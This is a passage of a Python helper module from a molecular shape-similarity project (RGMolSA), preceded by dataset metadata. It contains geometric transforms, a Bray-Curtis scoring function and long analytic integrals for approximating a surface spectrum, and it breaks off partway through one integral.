| 20.222222 | 58 | 0.686813 | 23 | 182 | 5.26087 | 0.695652 | 0.099174 | 0.413223 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.0125 | 0.120879 | 182 | 8 | 59 | 22.75 | 0.74375 | 0 | 0 | 0 | 0 | 0 | 0.098901 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.4 | true | 0 | 0.2 | 0.4 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
d2c108a480fe9b0cf2386dd5252d7f133921f586 | 218,115 | py | Python | scripts/utils.py | RPirie96/RGMolSA | 72648700d3b29aa37414b27b8a213b1c5d377302 | [
"MIT"
] | 2 | 2022-01-14T13:01:09.000Z | 2022-01-17T16:15:53.000Z | scripts/utils.py | RPirie96/RGMolSA | 72648700d3b29aa37414b27b8a213b1c5d377302 | [
"MIT"
] | null | null | null | scripts/utils.py | RPirie96/RGMolSA | 72648700d3b29aa37414b27b8a213b1c5d377302 | [
"MIT"
] | 2 | 2022-01-17T16:16:01.000Z | 2022-03-08T07:58:00.000Z | """
script of helper functions
"""
from collections import namedtuple
import numpy as np
import math
from scipy.spatial import distance
def get_chain(no_atoms, level_mat, adjacency_matrix, sphere, level):
"""
Inputs the level matrix, Intersection matrix and writes the path from base sphere
@param no_atoms:
@param level_mat:
@param adjacency_matrix:
@param sphere:
@param level:
@return: chain - path through molecule from base sphere
"""
chain = np.zeros(
level + 1, dtype=int
) # whatever the level is we will output a vector of length L+1
i = level
current_sphere = sphere
chain[level] = sphere
while i > 0:
for k in range(0, no_atoms):
# if there is a lower level non-t sphere and it meets the current sphere
if level_mat[i - 1][k] == 1 and adjacency_matrix[current_sphere][k] == 1:
current_sphere = k
chain[i - 1] = k
i = i - 1
return chain
def get_m_rot(vector):
"""
the element of SO(3) that carries out the rotation
@param vector:
@return: m_rot
"""
m_rot = np.array(
[
[
1 - ((vector[0] ** 2) / (1 + vector[2])),
-vector[0] * vector[1] / (1 + vector[2]),
vector[0],
],
[
-vector[0] * vector[1] / (1 + vector[2]),
1 - ((vector[1] ** 2) / (1 + vector[2])),
vector[1],
],
[-vector[0], -vector[1], vector[2]],
]
)
return m_rot
# helper functions for performing piecewise stereographic projection
# if we rotate (0,0,1) onto (v_1,v_2,v_3) this induces an element of PSU(2) [[alpha, beta],[-conj(beta), alpha]]
def alpha_coefficient(vector): # alpha coefficient
"""
function to get alpha coefficient
@param vector:
@return: alpha
"""
if (vector[2] + 1) ** 2 > 10 ** (-9):
return math.sqrt((1 + vector[2]) / 2)
else:
return 0
def beta_coefficient(vector): # beta coefficient
"""
function to get beta coefficient
@param vector:
@return: beta
"""
if (vector[2] + 1) ** 2 > 10 ** (-9):
return -math.sqrt(1 / (2 * (1 + vector[2]))) * complex(vector[0], vector[1])
else:
return 1j
def t_circle(alpha, beta, gamma, delta, c, r_rel):
"""
function that computes the centre and radius of the image of a circle under the Mobius transformation
z-->(az+b)/(cz+d)
@param alpha:
@param beta:
@param gamma:
@param delta:
@param c:
@param r_rel:
@return: [cent, Radius]
"""
cent = (
((beta + (c * alpha)) * np.conj(delta + (c * gamma)))
- (r_rel * r_rel * alpha * np.conj(gamma))
) / ((abs(delta + (c * gamma)) ** 2) - (r_rel * abs(gamma)) ** 2)
k = (((r_rel * abs(alpha)) ** 2) - (abs(beta + (c * alpha))) ** 2) / (
(abs(delta + (c * gamma)) ** 2) - (r_rel * abs(gamma)) ** 2
)
radius = math.sqrt(abs(k + abs(cent) ** 2))
return [cent, radius]
def transform_v2(a, r):
"""
@param a:
@param r:
@return: transform
"""
alpha = 1
beta = (
(abs(a) ** 2 - r ** 2 - 1)
+ math.sqrt((abs(a) ** 2 - r ** 2 - 1) ** 2 + 4 * abs(a) ** 2)
) / (-2 * np.conj(a))
scale = 1 + abs(beta) ** 2
alpha = alpha / np.sqrt(scale)
beta = beta / np.sqrt(scale)
transform = np.array([[alpha, beta], [-np.conj(beta), alpha]])
if abs((-beta / alpha) - a) > r:
transform = np.array([[np.conj(beta), alpha], [-alpha, beta]])
return transform
def cut_10(inputs, error, lev_keep=11):
"""
Function to cut out levels > 10 (removes "crunching" of spheres that triggers LinAlgError)
@param lev_keep: default = 11, specified by script for mols with < 10 levels that trigger LinAlgError
@param inputs:
@param error:
@return: updated inputs with > level 10 atoms omitted
"""
# unpack tuples
no_atoms = inputs.no_atoms
adjacency_matrix = inputs.adjacency_matrix
radii = inputs.radii
centres = inputs.centres
sphere_levels_vec = error.sphere_levels_vec
keep = [] # vector telling us whether to keep (1) or cut (0) sphere
for sphere in range(0, no_atoms):
level = sphere_levels_vec[sphere]
if level < lev_keep:
keep.append(1)
else:
keep.append(0)
size = sum(keep)
new_centres = np.zeros((size, 3), dtype=float)
new_radii = np.zeros(size, dtype=float)
adj_mat_2 = np.zeros((size, size), dtype=int)
ind_i = 0
for sphere in range(0, no_atoms):
if keep[sphere] == 1:
new_centres[ind_i][0] = centres[sphere][0]
new_centres[ind_i][1] = centres[sphere][1]
new_centres[ind_i][2] = centres[sphere][2]
new_radii[ind_i] = radii[sphere]
ind_j = 0
for sphere_2 in range(0, no_atoms):
if keep[sphere_2] == 1:
adj_mat_2[ind_i, ind_j] = adjacency_matrix[sphere, sphere_2]
ind_j += 1
ind_i += 1
adjacency_matrix = adj_mat_2
new_inputs = namedtuple(
"input", ["no_atoms", "radii", "centres", "adjacency_matrix"]
)
return new_inputs(
no_atoms=size,
radii=new_radii,
centres=new_centres,
adjacency_matrix=adjacency_matrix,
)
def get_score(query, test, query_id=None, test_id=None):
"""
Function to compute the normalised Bray-Curtis distance between two molecules
@param query:
@param test:
@param query_id:
@param test_id:
@return: "self" if the query and test ids match, score rounded to 3dp
"""
if query_id is not None:
if query_id == test_id:
return "self" # marker for self comparison
else:
return round((1 - distance.braycurtis(query, test)), 3) # return score to 3dp
else:
return round((1 - distance.braycurtis(query, test)), 3) # return score to 3dp
def vol_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return: vol_integral
"""
a_conj = np.conj(a)
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
ret = (1 / 4) * (
1 / k_1 - 1 / k_2 + x ** 2 / (b * k_2) + (k_0 * (1 / k_1 - 1 / k_2)) / b
)
return 4 * np.pi * c * ret
def x_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return: x_integral
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
k_3 = a ** 2 * a_conj ** 2
if abs(a_conj) >= 0.00000001:
ret = (
(a + a_conj)
* (
np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
* (
a ** 3 * a_conj ** 3
+ k_3 * (1 + b - x ** 2)
+ (-1 + b) * (-(b ** 2) - b * x ** 2 + k_1 * k_2)
- k_0 * (b ** 2 + x ** 2 + 2 * b * (-1 + x ** 2) + k_1 * k_2)
)
+ 4
* k_0
* b
* k_2
* np.arctanh(
(k_3 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
/ (k_1 * np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)))
)
- 4
* k_0
* b
* k_2
* np.arctanh(
(
k_3
+ b ** 2
- x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
)
)
) / (
2
* k_0
* b
* (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (3 / 2)
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
return -2 * np.pi * c * ret
else:
return 0
def z_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return: z_integral
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
k_3 = a ** 2 * a_conj ** 2
k_4 = np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
k_12 = k_1 * k_2
k_14 = k_1 * k_4
k_24 = k_2 * k_4
if abs(a_conj) >= 0.00000001:
ret = (
(-a) * a_conj * k_14
+ a ** 3 * a_conj ** 3 * k_14
- b * k_14
+ 4 * k_0 * b * k_14
+ 3 * k_3 * b * k_14
+ 4 * b ** 2 * k_14
+ 3 * k_0 * b ** 2 * k_14
+ b ** 3 * k_14
+ k_14 * x ** 2
- k_3 * k_14 * x ** 2
+ 4 * b * k_14 * x ** 2
- 2 * k_0 * b * k_14 * x ** 2
- b ** 2 * k_14 * x ** 2
+ k_0 * k_24
- a ** 3 * a_conj ** 3 * k_24
+ b * k_24
- 4 * k_0 * b * k_24
- 3 * k_3 * b * k_24
- 4 * b ** 2 * k_24
- 3 * k_0 * b ** 2 * k_24
- b ** 3 * k_24
+ 4 * b * (-1 + k_0 + b) * k_12 * np.log(k_0 - b + (k_0 + b) ** 2 + k_14)
+ 4 * b * (-1 + k_0 + b) * k_12 * np.log(1 + x ** 2)
+ 4
* b
* k_12
* np.log(
k_3
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
- 4
* k_0
* b
* k_1
* k_2
* np.log(
k_3
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
- 4
* b ** 2
* k_12
* np.log(
k_3
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
) / (
4
* b
* k_1
* (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (3 / 2)
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 > np.sqrt(0.00000001):
ret = (
x ** 2
- b ** 2 * x ** 2
+ 2 * b * (b + x ** 2) * np.log(b)
+ 2 * b * (b + x ** 2) * np.log(1 + x ** 2)
- 2 * b ** 2 * np.log(b + x ** 2)
- 2 * b * x ** 2 * np.log(b + x ** 2)
) / (2 * (-1 + b) ** 2 * b * (b + x ** 2))
return 4 * np.pi * c * ret
if abs(a_conj) < 0.00000001 and (b - 1) ** 2 <= np.sqrt(0.00000001):
ret = 0.5 * x ** 2 / (1 + x ** 2) ** 2
return 4 * np.pi * c * ret
def xx_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return: xx_integral
"""
a_conj = np.conj(a)
k_1 = np.sqrt((a * a_conj + b) ** 2)
k_2 = np.sqrt(
(a * a_conj + b) ** 2 - 2 * a * a_conj * x ** 2 + 2 * b * x ** 2 + x ** 4
)
k_3 = np.sqrt(a ** 2 * a_conj ** 2 + (-1 + b) ** 2 + 2 * a * a_conj * (1 + b))
if abs(a_conj) >= 0.00000001:
ret = (
np.sqrt(1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2)
* (
a ** 7 * a_conj ** 5 * (-1 + b - x ** 2)
+ a ** 6
* a_conj ** 4
* (
-2
+ 3 * b
+ 5 * b ** 2
- x ** 2
- 2 * b * x ** 2
+ x ** 4
- 2 * a_conj ** 2 * (1 + x ** 2)
+ b * x ** 2 * k_2
)
- a_conj ** 2
* (-1 + b) ** 3
* b
* (
-(b ** 2)
- x ** 4
+ k_1 * k_2
+ (1 + k_1) * x ** 2 * k_2
- b * x ** 2 * (2 + k_2)
)
+ a ** 5
* a_conj ** 3
* (
10 * b ** 3
+ a_conj ** 4 * (-1 + b - x ** 2)
+ 2 * a_conj ** 2 * (-2 + 2 * b - x ** 2 + x ** 4)
+ (1 + x ** 2) * (-1 + 2 * x ** 2 + k_1 * k_2)
+ 2 * b ** 2 * (6 + x ** 2 + 2 * x ** 2 * k_2)
- b
* (9 - 4 * x ** 4 + k_1 * k_2 + x ** 2 * (9 - 4 * k_2 + k_1 * k_2))
)
+ a ** 4
* a_conj ** 2
* (
10 * b ** 4
+ (1 + x ** 2) * (x ** 2 + 2 * k_1 * k_2)
+ a_conj ** 4
* (
-2
+ 3 * b
+ 5 * b ** 2
- x ** 2
- 2 * b * x ** 2
+ x ** 4
+ b * x ** 2 * k_2
)
+ b ** 3 * (8 + x ** 2 * (8 + 6 * k_2))
+ 2
* a_conj ** 2
* (
6 * b ** 2 * (2 + x ** 2)
+ b * (-8 - 7 * x ** 2 + 3 * x ** 4)
+ (1 + x ** 2) * (-1 + 2 * x ** 2 + k_1 * k_2)
)
- b ** 2
* (
-6 * x ** 4
+ 3 * (3 + k_1 * k_2)
+ x ** 2 * (-3 - 4 * k_2 + 3 * k_1 * k_2)
)
- b
* (
3
- 7 * x ** 4
+ 5 * k_1 * k_2
+ x ** 2 * (-8 - 6 * k_2 + 5 * k_1 * k_2)
)
)
- a
* a_conj ** 3
* (-1 + b)
* (
-5 * b ** 4
+ k_1 * (1 + x ** 2) * k_2
- b ** 3 * (2 + x ** 2 * (7 + 4 * k_2))
+ b ** 2
* (
-4 * x ** 4
+ 3 * x ** 2 * (-4 + k_1 * k_2)
+ 3 * (-1 + k_1 * k_2)
)
+ b
* (
-6 * x ** 4
+ 6 * k_1 * k_2
+ x ** 2 * (-1 + 4 * k_2 + 6 * k_1 * k_2)
)
)
- a ** 2
* (
(-1 + b) ** 3
* b
* (
-(b ** 2)
- x ** 4
+ k_1 * k_2
+ (1 + k_1) * x ** 2 * k_2
- b * x ** 2 * (2 + k_2)
)
+ 2
* a_conj ** 2
* (-1 + b)
* (
-(b ** 3) * (5 + 3 * x ** 2)
- b ** 2 * (1 + 6 * x ** 2 + x ** 4)
+ k_1 * (1 + x ** 2) * k_2
+ b
* (-5 * x ** 4 + 5 * k_1 * k_2 + x ** 2 * (-3 + 5 * k_1 * k_2))
)
+ a_conj ** 4
* (
-10 * b ** 4
- (1 + x ** 2) * (x ** 2 + 2 * k_1 * k_2)
- 2 * b ** 3 * (4 + x ** 2 * (4 + 3 * k_2))
+ b ** 2
* (
-6 * x ** 4
+ 3 * (3 + k_1 * k_2)
+ x ** 2 * (-3 - 4 * k_2 + 3 * k_1 * k_2)
)
+ b
* (
3
- 7 * x ** 4
+ 5 * k_1 * k_2
+ x ** 2 * (-8 - 6 * k_2 + 5 * k_1 * k_2)
)
)
)
- a ** 3
* a_conj
* (
a_conj ** 4
* (
-10 * b ** 3
- (1 + x ** 2) * (-1 + 2 * x ** 2 + k_1 * k_2)
- 2 * b ** 2 * (6 + x ** 2 + 2 * x ** 2 * k_2)
+ b
* (
9
- 4 * x ** 4
+ k_1 * k_2
+ x ** 2 * (9 - 4 * k_2 + k_1 * k_2)
)
)
+ 2
* a_conj ** 2
* (
-2 * b ** 3 * (7 + 4 * x ** 2)
+ b ** 2 * (10 + 3 * x ** 2 - 3 * x ** 4)
- (1 + x ** 2) * (x ** 2 + 2 * k_1 * k_2)
+ 2
* b
* (
1
- 3 * x ** 4
+ 2 * k_1 * k_2
+ x ** 2 * (-3 + 2 * k_1 * k_2)
)
)
+ (-1 + b)
* (
-5 * b ** 4
+ k_1 * (1 + x ** 2) * k_2
- b ** 3 * (2 + x ** 2 * (7 + 4 * k_2))
+ b ** 2
* (
-4 * x ** 4
+ 3 * x ** 2 * (-4 + k_1 * k_2)
+ 3 * (-1 + k_1 * k_2)
)
+ b
* (
-6 * x ** 4
+ 6 * k_1 * k_2
+ x ** 2 * (-1 + 4 * k_2 + 6 * k_1 * k_2)
)
)
)
)
+ 4
* a ** 2
* a_conj ** 2
* b
* (
a ** 3 * a_conj * (-3 + a_conj ** 2)
+ 3 * a ** 2 * (-1 + a_conj ** 2 * (-1 + b) - b)
+ (-3 * a_conj ** 2 + (-1 + b) ** 2) * (1 + b)
- a * a_conj * (3 + 3 * a_conj ** 2 + 4 * b - 3 * b ** 2)
)
* (1 + x ** 2)
* k_2
* np.arctanh(
(a ** 2 * a_conj ** 2 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
/ (k_1 * k_3)
)
- 4
* a ** 2
* a_conj ** 2
* b
* (
a ** 3 * a_conj * (-3 + a_conj ** 2)
+ 3 * a ** 2 * (-1 + a_conj ** 2 * (-1 + b) - b)
+ (-3 * a_conj ** 2 + (-1 + b) ** 2) * (1 + b)
- a * a_conj * (3 + 3 * a_conj ** 2 + 4 * b - 3 * b ** 2)
)
* (1 + x ** 2)
* k_2
* np.arctanh(
(
a ** 2 * a_conj ** 2
+ a * a_conj * (1 + 2 * b - x ** 2)
+ (-1 + b) * (b + x ** 2)
)
/ (
k_3
* np.sqrt(
a ** 2 * a_conj ** 2
+ 2 * a * a_conj * (b - x ** 2)
+ (b + x ** 2) ** 2
)
)
)
) / (
2
* a ** 2
* a_conj ** 2
* b
* (1 + 2 * a * a_conj - 2 * b + (a * a_conj + b) ** 2) ** (5 / 2)
* (1 + x ** 2)
* np.sqrt(
a ** 2 * a_conj ** 2 + 2 * a * a_conj * (b - x ** 2) + (b + x ** 2) ** 2
)
)
return 2 * np.pi * c * ret
if abs(a_conj) <= 0.00000001 and (b - 1) ** 2 > np.sqrt(0.00000001):
ret = (
2
- 2 * b
- 1 / (1 + x ** 2)
+ b / (1 + x ** 2)
- b / (b + x ** 2)
+ b ** 2 / (b + x ** 2)
+ (1 + b) * np.log(b)
+ (1 + b) * np.log(1 + x ** 2)
- np.log(b + x ** 2)
- b * np.log(b + x ** 2)
) / (-1 + b) ** 3
return 4 * np.pi * c * ret
if abs(a_conj) <= 0.00000001 and (b - 1) ** 2 <= np.sqrt(0.00000001):
ret = x ** 4 * (3 + x ** 2) / (6 * (1 + x ** 2) ** 3)
return 4 * np.pi * c * ret
def xy_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
k_3 = a ** 2 * a_conj ** 2
k_12 = k_1 * k_2
if abs(a_conj) >= 0.00000001:
ret = (1 / (2 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (5 / 2))) * (
(a ** 2 - a_conj ** 2)
* (
(
np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
* (
a ** 5 * a_conj ** 5 * (-1 + b - x ** 2)
+ a ** 4
* a_conj ** 4
* (
-2
+ 3 * b
+ 5 * b ** 2
- x ** 2
- 2 * b * x ** 2
+ x ** 4
+ b * x ** 2 * k_2
)
- (-1 + b) ** 3
* b
* (
-(b ** 2)
- x ** 4
+ k_12
+ (1 + k_1) * x ** 2 * k_2
- b * x ** 2 * (2 + k_2)
)
- a ** 3
* a_conj ** 3
* (
-10 * b ** 3
- (1 + x ** 2) * (-1 + 2 * x ** 2 + k_12)
- 2 * b ** 2 * (6 + x ** 2 + 2 * x ** 2 * k_2)
+ b
* (9 - 4 * x ** 4 + k_12 + x ** 2 * (9 - 4 * k_2 + k_12))
)
- k_3
* (
-10 * b ** 4
- (1 + x ** 2) * (x ** 2 + 2 * k_12)
- 2 * b ** 3 * (4 + x ** 2 * (4 + 3 * k_2))
+ b ** 2
* (
-6 * x ** 4
+ 3 * (3 + k_12)
+ x ** 2 * (-3 - 4 * k_2 + 3 * k_12)
)
+ b
* (
3
- 7 * x ** 4
+ 5 * k_12
+ x ** 2 * (-8 - 6 * k_2 + 5 * k_12)
)
)
- k_0
* (-1 + b)
* (
-5 * b ** 4
+ k_1 * (1 + x ** 2) * k_2
- b ** 3 * (2 + x ** 2 * (7 + 4 * k_2))
+ b ** 2
* (-4 * x ** 4 + 3 * x ** 2 * (-4 + k_12) + 3 * (-1 + k_12))
+ b
* (
-6 * x ** 4
+ 6 * k_12
+ x ** 2 * (-1 + 4 * k_2 + 6 * k_12)
)
)
)
)
/ (k_3 * b * (1 + x ** 2) * k_2)
- 12
* (1 + k_0 + b)
* np.log(
k_0
- b
+ (k_0 + b) ** 2
+ k_1 * np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
)
- 12 * (1 + k_0 + b) * np.log(1 + x ** 2)
+ 12
* (1 + k_0 + b)
* np.log(
k_3
- b
+ b ** 2
- x ** 2
+ b * x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
)
)
return (2 / 1j) * np.pi * c * ret
else:
return 0
def xz_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = np.sqrt((k_0 + b) ** 2 - 2 * k_0 * x ** 2 + 2 * b * x ** 2 + x ** 4)
k_3 = a ** 2 * a_conj ** 2
k_12 = k_1 * k_2
if abs(a_conj) >= 0.00000001:
ret = (1 / (8 * (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** (5 / 2))) * (
(a + a_conj)
* (
(
np.sqrt(1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
* (
(-(a ** 5)) * a_conj ** 5 * (1 + x ** 2)
- a ** 4 * a_conj ** 4 * (1 + 3 * b - x ** 2) * (1 + x ** 2)
- (-1 + b) ** 2
* (1 + b)
* (1 + x ** 2)
* (-(b ** 2) - b * x ** 2 + k_12)
+ a ** 3
* a_conj ** 3
* (
-2 * b ** 2 * (1 + x ** 2)
+ 4 * b * (-5 - 2 * x ** 2 + x ** 4)
+ (1 + x ** 2) * (1 + x ** 2 + k_12)
)
+ k_3
* (
2 * b ** 3 * (1 + x ** 2)
+ 2 * b ** 2 * (-19 - 8 * x ** 2 + 3 * x ** 4)
+ (1 + x ** 2) * (1 - x ** 2 + k_12)
+ b * (1 + x ** 4 + k_12 + x ** 2 * (18 + k_12))
)
- k_0
* (
-3 * b ** 4 * (1 + x ** 2)
- 4 * b ** 3 * (-5 - 2 * x ** 2 + x ** 4)
+ (1 + x ** 2) * (x ** 2 + k_12)
+ b ** 2 * (1 + x ** 4 + k_12 + x ** 2 * (18 + k_12))
- 2
* b
* (1 - 9 * x ** 4 + 9 * k_12 + x ** 2 * (-4 + 9 * k_12))
)
)
)
/ (k_0 * b * (1 + x ** 2) * k_2)
- 12
* (-1 + (k_0 + b) ** 2)
* np.arctanh(
(k_3 + (-1 + b) * b + a * (a_conj + 2 * a_conj * b))
/ (k_1 * np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)))
)
+ 12
* (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2)
* np.arctanh(
(
k_3
+ b ** 2
- x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt((k_0 + b) ** 2 - 2 * (k_0 - b) * x ** 2 + x ** 4)
)
)
- 24
* (1 + k_0 - b)
* np.arctanh(
(
k_3
+ b ** 2
- x ** 2
+ k_0 * (1 + 2 * b - x ** 2)
+ b * (-1 + x ** 2)
)
/ (
np.sqrt(k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* np.sqrt(k_3 + 2 * k_0 * (b - x ** 2) + (b + x ** 2) ** 2)
)
)
)
)
return -8 * np.pi * c * ret
else:
return 0
def xxx_integral(a, b, c, x):
"""
function involved in computing the a_matrix (Rayleigh Ritz approx of the spectrum)
@param a:
@param b:
@param c:
@param x:
@return:
"""
a_conj = np.conj(a)
# helper variables to tidy up function
k_0 = a * a_conj
k_1 = np.sqrt((k_0 + b) ** 2)
k_2 = a * a_conj ** 3
k_3 = a ** 2 * a_conj ** 2
k_4 = a * a_conj ** 4
if abs(a_conj) >= 0.00000001:
ret = (1 / (4 * a ** 3 * a_conj ** 3)) * (
-(a ** 3)
+ a ** 4 * a_conj
- a_conj ** 3
+ k_4
+ 2 * (a ** 3 + a_conj ** 3)
+ a ** 3 * b
+ a_conj ** 3 * b
- (1 / (b * (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b)) ** 3))
* (
k_1
* (
a ** 9 * a_conj ** 6 * b
+ a_conj ** 3 * (-1 + b) ** 5 * b ** 2
+ k_4 * (-1 + b) ** 3 * b * (2 + 5 * b + 6 * b ** 2)
+ a ** 8 * a_conj ** 5 * (-1 + 7 * b + 6 * b ** 2)
+ a ** 7
* a_conj ** 4
* (-3 - 3 * a_conj ** 2 + 22 * b + 23 * b ** 2 + 15 * b ** 3)
+ a ** 6
* a_conj ** 3
* (
-3
- 3 * a_conj ** 4
- b
+ a_conj ** 6 * b
+ 32 * b ** 2
+ 22 * b ** 3
+ 20 * b ** 4
+ a_conj ** 2 * (-9 + 30 * b)
)
+ a ** 5
* a_conj ** 2
* (
-1
- 19 * b
+ 3 * b ** 2
+ 4 * b ** 3
- 2 * b ** 4
+ 15 * b ** 5
+ a_conj ** 4 * (-9 + 30 * b)
+ a_conj ** 6 * (-1 + 7 * b + 6 * b ** 2)
+ 3 * a_conj ** 2 * (-3 - 5 * b + 22 * b ** 2)
)
+ a ** 4
* (
a_conj * (-1 + b) ** 3 * b * (2 + 5 * b + 6 * b ** 2)
+ 3 * a_conj ** 5 * (-3 - 5 * b + 22 * b ** 2)
+ 3 * a_conj ** 3 * (-1 - 14 * b + 5 * b ** 2 + 10 * b ** 3)
+ a_conj ** 7 * (-3 + 22 * b + 23 * b ** 2 + 15 * b ** 3)
)
+ a ** 2
* a_conj ** 3
* (-1 + b)
* (
-3 * (-1 + b) ** 2 * b
+ a_conj ** 2
* (1 + 20 * b + 17 * b ** 2 + 13 * b ** 3 + 15 * b ** 4)
)
+ a ** 3
* (
-3 * a_conj ** 2 * (-1 + b) ** 3 * b
+ (-1 + b) ** 5 * b ** 2
+ 3 * a_conj ** 4 * (-1 - 14 * b + 5 * b ** 2 + 10 * b ** 3)
+ a_conj ** 6
* (-3 - b + 32 * b ** 2 + 22 * b ** 3 + 20 * b ** 4)
)
)
)
- ((a ** 3 + a_conj ** 3) * (-1 + k_0 + b)) / (1 + x ** 2) ** 2
- (2 * (a ** 3 + a_conj ** 3)) / (1 + x ** 2)
+ (1 / (1 + 2 * k_0 - 2 * b + (k_0 + b) ** 2) ** 3)
* (
np.sqrt(-4 * k_0 * x ** 2 + (k_0 + b + x ** 2) ** 2)
* (
(1 / (1 + x ** 2) ** 2)
* (
(a + a_conj)
* (k_3 + (-1 + b) ** 2 + 2 * k_0 * (1 + b))
* (
a ** 6 * a_conj ** 4
+ a_conj ** 2 * (-1 + b) ** 4
+ a ** 5 * a_conj ** 3 * (2 - a_conj ** 2 + 4 * b)
+ a ** 4
* (
a_conj ** 6
+ 6 * a_conj ** 2 * b ** 2
- 2 * a_conj ** 4 * (1 + 2 * b)
)
+ a ** 2
* (
(-1 + b) ** 4
+ 6 * a_conj ** 4 * b ** 2
- 2 * a_conj ** 2 * (-1 + b) ** 2 * (1 + 2 * b)
)
+ a
* (
(-a_conj) * (-1 + b) ** 4
+ a_conj ** 3 * (-1 + b) ** 2 * (2 + 4 * b)
)
+ 2
* a ** 3
* (
a_conj ** 5 * (1 + 2 * b)
+ a_conj * (-1 + b) ** 2 * (1 + 2 * b)
- 3 * a_conj ** 3 * (1 + b ** 2)
)
)
)
+ (1 / (1 + x ** 2))
* (
3 * a ** 8 * a_conj ** 5
+ a_conj ** 3 * (-1 + b) ** 5
+ 13 * a ** 7 * a_conj ** 4 * (1 + b)
+ 7 * k_4 * (-1 + b) ** 3 * (1 + b)
+ 2
* a ** 6
* a_conj ** 3
* (-1 + 12 * a_conj ** 2 + 11 * b + 11 * b ** 2)
+ 18 * a ** 2 * a_conj ** 5 * (-1 + b ** 3)
+ a ** 4
* (
13 * a_conj ** 7 * (1 + b)
+ 7 * a_conj * (-1 + b) ** 3 * (1 + b)
+ 6 * a_conj ** 5 * (1 + 8 * b)
